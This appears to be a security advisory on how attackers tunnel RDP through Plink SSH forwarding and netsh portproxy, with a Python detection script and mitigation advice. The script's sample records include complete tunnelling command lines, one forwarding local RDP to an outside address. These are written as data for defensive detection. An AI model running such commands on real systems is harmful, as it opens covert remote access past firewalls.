Remote Desktop Protocol (RDP) is a Windows component that gives administrators and users a remote path to their systems. A group of malicious actors has been abusing this feature to attack vulnerable systems, since this kind of attack can sometimes be harder to detect than a backdoor.

“Malicious users resort to the use of RDP due to its stability and functionality over a backdoor. Hackers use the native Windows RDP functions to connect laterally through systems in compromised environments.”

Access to a system via RDP gives attackers persistence, although it depends on an additional attack vector, such as a phishing attack, to gain initial entry to the compromised system. In addition, attackers have increasingly resorted to network tunneling and host-based port forwarding.

Using these techniques, attackers can establish a connection to a remote server that is otherwise blocked by a firewall, then exploit that connection as a transport to ‘dig a tunnel’ through the firewall to local services.

One utility used to tunnel RDP sessions is PuTTY Link (Plink), which lets attackers establish SSH connections to other systems. According to our network security experts, since many environments neither inspect protocols nor block SSH communications leaving their network, attackers can use the tool to create encrypted tunnels and establish RDP connections with their C&C server.

RDP sessions also let attackers move laterally through an environment: they can use the native Windows Network Shell (netsh) command to set up RDP port forwarding and discover segmented networks.
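The two techniques above leave traces in process-creation telemetry. The following detection logic is an added example, not code from the original article or from CTDSec: it assumes process events exported as records with `host`, `user` and `cmd` fields (as a SIEM might export Sysmon Event ID 1 or Security Event ID 4688), and flags Plink/SSH forwards whose target port is 3389 as well as `netsh interface portproxy add` entries. The sample records and the finding labels are constructed for the example.

```python
import re
from typing import Dict, List, Optional

RDP_PORT = "3389"
# SSH-style forward: -R/-L [bind:]port:host:hostport (last field is the target port)
SSH_FORWARD = re.compile(r"\s-(?P<flag>[RL])\s+(?P<spec>[\w.\-:\[\]]+)")
# netsh interface portproxy add v4tov4 listenport=... connectport=... connectaddress=...
PORTPROXY_ADD = re.compile(r"\bportproxy\s+add\s+v\dtov\d\s+(?P<args>.+)", re.I)

def image_name(cmd: str) -> str:
    """Lower-cased executable base name from a command line (handles quoted paths)."""
    token = cmd[1:cmd.index('"', 1)] if cmd.startswith('"') else cmd.split()[0]
    name = re.split(r"[\\/]", token)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def classify(cmd: str) -> Optional[str]:
    """Return a finding label for one process command line, or None if nothing matched."""
    exe = image_name(cmd)
    if exe in ("plink", "ssh"):
        for m in SSH_FORWARD.finditer(cmd):
            if m.group("spec").split(":")[-1] == RDP_PORT:
                return f"ssh_{m.group('flag')}_forward_to_rdp"
    elif exe == "netsh":
        m = PORTPROXY_ADD.search(cmd)
        if m:
            kv = {k.lower(): v for k, v in
                  (p.split("=", 1) for p in m.group("args").split() if "=" in p)}
            return ("netsh_portproxy_to_rdp" if kv.get("connectport") == RDP_PORT
                    else "netsh_portproxy_add")
    return None

def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over process-creation records and return the flagged ones."""
    return [dict(e, finding=f) for e in events if (f := classify(e["cmd"]))]

# Constructed sample records (hypothetical hosts, users and addresses).
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "jdoe",
     "cmd": r'"C:\Users\jdoe\Downloads\plink.exe" -P 443 -R 12345:127.0.0.1:3389 admin@203.0.113.10'},
    {"host": "ws02", "user": "svc-ops",
     "cmd": "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.0.5.20"},
    {"host": "ws03", "user": "bob", "cmd": "ssh -L 8022:10.0.0.5:22 bob@bastion.example"},
    {"host": "ws04", "user": "alice", "cmd": "netsh advfirewall show allprofiles"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"{hit['host']} {hit['user']}: {hit['finding']} <- {hit['cmd']}")
```

The third record (an SSH forward to port 22) and the fourth (a read-only netsh query) are deliberately left unflagged, so the rule triggers on forwards that terminate at RDP rather than on any use of these tools.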

Our solutions to these issues, from the CTDSec group:

– Host- and network-based prevention and detection mechanisms must provide organizations with the necessary defenses to mitigate this kind of attack.

– Disabling RDP when not in use and enabling host firewall rules that prohibit incoming RDP connections are useful measures to reinforce risk prevention.

– At the network level, administrators must enforce that RDP connections originate from a designated jump box or central administration server, prevent privileged accounts from being used over RDP, review firewall rules to identify port forwarding vulnerabilities, and inspect the content of network traffic.
